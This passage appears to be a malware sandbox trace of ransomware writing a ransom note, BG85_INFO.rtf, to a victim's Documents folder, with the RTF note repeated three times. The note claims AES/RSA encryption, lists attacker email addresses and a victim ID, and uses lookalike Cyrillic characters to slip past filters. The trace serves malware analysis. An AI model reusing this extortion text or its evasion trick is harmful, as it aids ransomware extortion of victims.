u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n¤#9#,&«\x1e­\x8c…?4kP@<õL\x88f#Öã\x9b\x1d\x8e\x8c¥Ù\x09,Z/µ×jd0\x88\x9d]8ÏgNFâ.Ä4ìïÎ1ð£\x0bkzsµ³[÷\x96\x1d\x0eÖ\x97\x8d\x07q?G\x16~\x03\x13\x88ª#C6ôaK=\x96\x0f%ǨæúpW¼\x88²pµ´ò{Îî(sÛ\x1cC\x01þáý\x9aYf}\x1e\x13£1/ø¡r$oÛ\x03Û/¤ê\x83\x0b{¸zu\x9c%2±VX*P\x1dZ\x95´Ñ-\x835\x8c\x8a¶ \"èÃÐì'\n\x91\x9ee<\rÜ.ß0©Ö\x18ù\x1b!o\x8aͶ\x1a\x1cnô\x04\x80´*+¯~ÐJ9*à²9+|¨ð\x1eò\x98Ó\x0b", lpUsedDefaultChar=0x0) returned 7247 [0067.820] WriteFile (in: hFile=0x1dc, lpBuffer=0x2668a38*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2668a38*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0067.821] CloseHandle (hObject=0x1dc) returned 1 [0067.821] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\BG85_INFO.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bg85_info.rtf")) returned 0xffffffff [0067.821] GetLastError () returned 0x2 [0067.821] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\BG85_INFO.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0067.822] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0067.822] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0067.822] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 